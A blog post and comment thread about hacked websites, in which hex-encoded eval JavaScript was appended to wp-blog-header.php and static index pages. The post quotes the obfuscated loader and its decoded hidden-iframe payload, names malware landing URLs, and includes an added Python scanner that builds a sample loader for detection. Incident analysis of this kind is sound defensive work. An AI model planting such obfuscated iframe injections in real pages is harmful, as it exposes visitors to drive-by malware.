Since the problem in 2007 my web sites have been running pretty smoothly. I never did get to the bottom of what caused it but the suspicion was an out of date WordPress install which had some sort of vulnerability.
This month it happened again. I first spotted it on 6 Jun when I saw a big iFrame appear below the page footer of this blog. Again there was a suspicion of a down-level WordPress but it was only one dot point off current. Nevertheless, I updated and the problem went away by wiping out the infected files. In fact, I did it so fast that I didn’t have time to investigate fully.
A week later, the problem was back and now, because I was fully up to date, I had to look more closely.
The code inserted was
[script]var t="";var arr="...";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);[/script]
which decodes to execute
document.write('[iframe src="http://esformofset.com/forum/php?tp=675eafec431b1f72" width="1" height="1" frameborder="0"][/iframe]')
The hacked code was tacked on the end of module wp-blog-header.php so it is clear that the infection understands WordPress. Later I was informed by a regular visitor that some other (static) pages on the site were also infected. One drawback of running a browser with full protection like Firefox with NoScript is that you can’t easily spot things like this when they occur. Anyway, I spent an hour yesterday evening clearing up the rest of the site. It had infected almost all files called index.htm and home.htm and one or two others with a high page rank due to a lot of external referrers. The inserted code was after <body> and was either identical or very similar to the above (just a change of target web page).
So it is clear that the infection mechanism is clever, I just wish I knew what it was. I am no longer convinced that it is anything to do with WordPress – a zero-day vulnerability like this would have been reported by now and, at the time of writing, I can find no other internet reference to this particular infection. There is no other active content on the site so that leaves the possibility of either a cracked password (all of which are strong and recently changed) or a compromised host server.
Wow, thanks for posting this. I thought I was going to lose my mind trying to figure this out.
My situation is a little different. My websites have been hacked in the same way. But I am sure it is a hosting problem. I host two websites on JustHost and noticed about 3 days ago that I could not reach my websites. Upon further poking, I realized that I could access every page except index.php or index.html. I contacted the support and they just told me that the index files had incorrect permissions (which I had not changed, btw). The permissions had been changed to 777 which is something I would never do. After correcting the permissions, I tried testing my websites. They load momentarily, and then Windows Media Player opens trying to play a file called “hcp_asx”.
After reading your article, I downloaded all index files from my sites. I found different code for each website but all similar to the code you posted above. I removed the code from each index file and that fixed it. I have kept the code to examine it further. But how did it get there?
In fact, the same thing is happening to my client who is also on Just Host, except he is on a different server. So I know that it has to be a site-wide hack on the Just Host systems or beyond. I am sending a copy to the JustHost support; hopefully they can track it down. It may also be that they are unaware of it and many of their customers are starting to notice the same thing. Either way, I hope I don’t have to repeat clearing that code. It’s a total security breach if their servers have been compromised and I would have to consider new hosting.
Thanks for posting the info. Let me know if you want a copy of the code.
I forgot to mention that before cleaning the code, when I tested my website and Windows Media Player popped up, Internet Explorer was in the background communicating with esformofset.com. Windows Media Player only pops up when using Internet Explorer. Safari and Firefox just crash altogether.
Thanks for your response, Donnie. My host is DotEasy so if it is a host attack then it may be widespread, though I am surprised that there is not more noise about it. Now you mention it, I must check the permissions on the files but I don’t recall that being a problem. We really have two questions to answer – how did they get in and how are they still getting in, which may not have the same answer. For instance, did they leave a backdoor which we haven’t yet found? I have pretty thoroughly searched the file structure and also the database and not found anything, but it is a massive undertaking even for a site as small as this and I can’t guarantee that there isn’t one there. I have two other sites with the same company, one on a different server, and they have not been infected (yet).
Note that not all my infected files were index.* – one was home.htm and another was a random name which happened to have a high PageRank due to external referrers. You do need to check the dates on all files for recent changes, fortunately they don’t seem to be spoofing the file modified dates.
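An added triage helper (my own example, not code from the post or its commenters) that statically decodes the hex-and-eval loader quoted in the post above, without running it, and walks a web root reporting infected files with their modification time and permission bits, as recommended here. The host `malware.example.invalid` and `tp=0000` in the sample are constructed placeholders, not the real target.

```python
import os
import re

# The injected loader as seen on the page: a hex string in `arr`, decoded two
# characters at a time with parseInt(..., 16) + String.fromCharCode, then eval'd.
LOADER_RE = re.compile(
    r'var\s+arr\s*=\s*"([0-9a-fA-F]+)"\s*;.*?String\.fromCharCode\('
    r'\s*parseInt\(.*?,\s*16\s*\)\s*\)\s*;\s*eval\(',
    re.DOTALL,
)
IFRAME_SRC_RE = re.compile(r'<iframe[^>]*?\ssrc=["\']([^"\']+)', re.IGNORECASE)

def decode_loader(text):
    """Statically decode every matching loader in `text`; nothing is eval'd."""
    return [bytes.fromhex(h).decode("latin-1") for h in LOADER_RE.findall(text)]

def iframe_targets(decoded):
    """Pull the iframe src (the drive-by landing URL) out of a decoded payload."""
    return IFRAME_SRC_RE.findall(decoded)

def scan_tree(root, modified_since):
    """Report every file under `root` carrying the loader: changed since
    `modified_since` (epoch seconds)?, permission bits (777 = world-writable,
    as one commenter found), and the decoded iframe targets."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    payloads = decode_loader(fh.read().decode("latin-1"))
            except OSError:
                continue
            if payloads:
                st = os.stat(path)
                findings.append({
                    "path": path,
                    "recent": st.st_mtime >= modified_since,
                    "mode": oct(st.st_mode & 0o777),
                    "targets": [t for p in payloads for t in iframe_targets(p)],
                })
    return findings

# Constructed sample, not the real payload: same loader shape, placeholder URL.
SAMPLE_PAYLOAD = ('document.write(\'<iframe src="http://malware.example.invalid/'
                  'forum.php?tp=0000" width="1" height="1" frameborder="0"></iframe>\')')
SAMPLE_SCRIPT = ('<script>var t="";var arr="%s";for(i=0;i<arr.length;i+=2)'
                 't+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>'
                 % SAMPLE_PAYLOAD.encode().hex())
```

Run `scan_tree("/path/to/webroot", time.time() - 7*86400)` to list the files touched in the last week that carry the loader; files that match but are not flagged recent suggest the modification dates are being spoofed.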
I got the same problem today! My browser crashed and something was loading in the background. I found that script in wp-blog-header.php, thx for that! But now I am not sure how to find the other snippets on my blog. I am from Germany. I didn’t find anything like this on the web, only in the virus database. Strange thing, can it be a security hole in WordPress? I use BuddyPress Theme and Plugins…
It is my opinion that this is nothing to do with WordPress. I have found web references to identical infections on Joomla sites on or around March 6th and vBulletin sites in mid May.
Mark – the only infection I found in WordPress was wp-blog-header.php like you. The rest were on static pages, mostly index.php, and identified by the last modified date.
And today (at about 15:30GMT onwards) they got every single file on this site – static and WordPress. I am getting fed up with it.
They got me and some other people I know Tuesday June 14th at roughly the same time. Some observations:
* It’s not a specifically WordPress thing – one site has no CMS installed – but it does seem to like wp-blog-header.php when it’s there.
* It seems to prefer sites with higher Google ranking. A site I’ve got with the same host but using a different account was unaffected.
* I don’t think it’s a PC -> FTP -> website thing because it happened to one person who never touches her site.
Apparently the JavaScript resolves to JavaScript that writes a 1x1 iframe containing a link that you may not want to investigate: mjbuuyaqs.co.be/forum.php?tp=b90d8ed9804251f3
Which still doesn’t solve how it’s getting in.
(Sorry, didn’t realise the link parsed to produce an actual link. It’s a malware site)
[Editor: OK, I have removed the http to stop it doing it.]
Thanks treebots – I agree with your observations. In particular the Google Rank thing; on the second occasion when I was only hit in a few places, it went for the ones with highest rank: on the last occasion when it hit almost everything, it left out those that were excluded from search engines by robots.txt. I have made a call to my hosting company to see if they come up with any ideas.
A website I developed for a client experienced the same problem in the past couple of days. The website is hand coded ASP and hosted on EasySpace. In Firefox & IE you can’t see a problem, however Google Chrome makes users trying to access the webpage aware of a potential problem.
There are few postings about the attack on the web. Most conclude that you should set all files to chmod 644.
Looking at my logs for Sunday, the culprit seems to be a dynamic address owned by Orange in Spain which systematically downloaded every page, modified it and sent it back. It was using FTP apparently with my administrator account so I have changed the password *again* on that and everything else. The file protections are all ok. There wasn’t any activity prior to that which I could see.
Well I think we have cracked it – I remembered last week that I had lent the FTP password to a friend to do some testing so we checked his machine and he had a number of infections. Cleaned that up and, for good measure, changed the master passwords again and we have got through this Sunday with no problems. It looks like a simple stolen password which was just used for upload of simply modified files. Though I shouldn’t say it, they could have done a lot better (or worse from our point of view).